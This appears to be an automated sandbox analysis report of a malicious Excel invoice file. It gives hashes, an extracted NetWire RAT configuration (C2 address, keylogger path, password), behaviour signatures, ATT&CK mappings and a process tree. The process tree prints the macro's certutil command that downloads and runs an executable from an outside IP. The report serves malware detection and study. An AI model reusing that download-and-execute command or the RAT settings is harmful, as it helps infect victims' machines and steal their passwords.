Analysis

  • max time kernel
    104s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-11-2022 07:15

General

  • Target

    Tax Invoice.xlsm

  • Size

    42KB

  • MD5

    241d9fbb42762beb00492d32d5e9d291

  • SHA1

    e6f1f8bbc40a59911543be499e1e07b54d55c3f4

  • SHA256

    e7df88b691f820535f249821d16054a01f33e0acf3ae12d0b64f98cced910012

  • SHA512

    a503b4e51bb09fa2e5c1b2a546cbf0c562200e77e67f2f81757f0b6f5460cc38e33d0ea871b7f7c1d92ed82ac3ca756a37e08a5e633077a560c9627516ea9aef

  • SSDEEP

    768:IvjsCvCssn3uBIJYfTH+niSpKvDH7Nv+nWhFFiKk/f7qtNhTxRB+nE2g7/:IvDvCT3uG1ByT7Nv+qFFi3/jqLxxyE2g

Malware Config

Extracted

Family

netwire

C2

212.193.30.230:3345

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    false

  • offline_keylogger

    true

  • password

    Password@9

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 4 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Tax Invoice.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4820
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c certutil.exe -urlcache -split -f "http://192.3.194.246/ecs.exe" Niipxzvceptnltqinb.exe.exe && Niipxzvceptnltqinb.exe.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Windows\system32\certutil.exe
        certutil.exe -urlcache -split -f "http://192.3.194.246/ecs.exe" Niipxzvceptnltqinb.exe.exe
        3⤵
          PID:3492
        • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
          Niipxzvceptnltqinb.exe.exe
          3⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3144
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c ping google.com
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4448
            • C:\Windows\SysWOW64\PING.EXE
              ping google.com
              5⤵
              • Runs ping.exe
              PID:3992
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3136
          • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
            C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
            4⤵
            • Executes dropped EXE
            PID:4944
          • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
            C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
            4⤵
            • Executes dropped EXE
            PID:1340

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Remote System Discovery

    1
    T1018

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Filesize

      7KB

      MD5

      828988c5e283c07b481aae790b9f1664

      SHA1

      68240ab5ec927d8ee2af027110faee0f2531c828

      SHA256

      44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133

      SHA512

      1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d

    • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Filesize

      7KB

      MD5

      828988c5e283c07b481aae790b9f1664

      SHA1

      68240ab5ec927d8ee2af027110faee0f2531c828

      SHA256

      44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133

      SHA512

      1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d

    • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Filesize

      7KB

      MD5

      828988c5e283c07b481aae790b9f1664

      SHA1

      68240ab5ec927d8ee2af027110faee0f2531c828

      SHA256

      44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133

      SHA512

      1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d

    • C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe
      Filesize

      7KB

      MD5

      828988c5e283c07b481aae790b9f1664

      SHA1

      68240ab5ec927d8ee2af027110faee0f2531c828

      SHA256

      44676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133

      SHA512

      1a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d

    • memory/1340-166-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1340-162-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1340-161-0x0000000000000000-mapping.dmp
    • memory/1340-167-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/1340-165-0x0000000000400000-0x0000000000433000-memory.dmp
      Filesize

      204KB

    • memory/2736-139-0x0000000000000000-mapping.dmp
    • memory/3136-158-0x0000000006660000-0x000000000667A000-memory.dmp
      Filesize

      104KB

    • memory/3136-151-0x0000000000000000-mapping.dmp
    • memory/3136-157-0x00000000079A0000-0x000000000801A000-memory.dmp
      Filesize

      6.5MB

    • memory/3136-156-0x0000000006150000-0x000000000616E000-memory.dmp
      Filesize

      120KB

    • memory/3136-155-0x0000000005AD0000-0x0000000005B36000-memory.dmp
      Filesize

      408KB

    • memory/3136-154-0x0000000005A60000-0x0000000005AC6000-memory.dmp
      Filesize

      408KB

    • memory/3136-153-0x00000000052C0000-0x00000000058E8000-memory.dmp
      Filesize

      6.2MB

    • memory/3136-152-0x0000000004B70000-0x0000000004BA6000-memory.dmp
      Filesize

      216KB

    • memory/3144-150-0x0000000007E00000-0x0000000007E22000-memory.dmp
      Filesize

      136KB

    • memory/3144-147-0x0000000006520000-0x000000000652A000-memory.dmp
      Filesize

      40KB

    • memory/3144-146-0x0000000005430000-0x00000000054C2000-memory.dmp
      Filesize

      584KB

    • memory/3144-145-0x0000000005AE0000-0x0000000006084000-memory.dmp
      Filesize

      5.6MB

    • memory/3144-144-0x0000000000A90000-0x0000000000A98000-memory.dmp
      Filesize

      32KB

    • memory/3144-141-0x0000000000000000-mapping.dmp
    • memory/3492-140-0x0000000000000000-mapping.dmp
    • memory/3992-149-0x0000000000000000-mapping.dmp
    • memory/4448-148-0x0000000000000000-mapping.dmp
    • memory/4820-138-0x00007FFB30520000-0x00007FFB30530000-memory.dmp
      Filesize

      64KB

    • memory/4820-132-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
      Filesize

      64KB

    • memory/4820-137-0x00007FFB30520000-0x00007FFB30530000-memory.dmp
      Filesize

      64KB

    • memory/4820-136-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
      Filesize

      64KB

    • memory/4820-135-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
      Filesize

      64KB

    • memory/4820-133-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
      Filesize

      64KB

    • memory/4820-134-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
      Filesize

      64KB

    • memory/4820-169-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
      Filesize

      64KB

    • memory/4820-170-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
      Filesize

      64KB

    • memory/4820-171-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
      Filesize

      64KB

    • memory/4820-172-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
      Filesize

      64KB

    • memory/4944-159-0x0000000000000000-mapping.dmp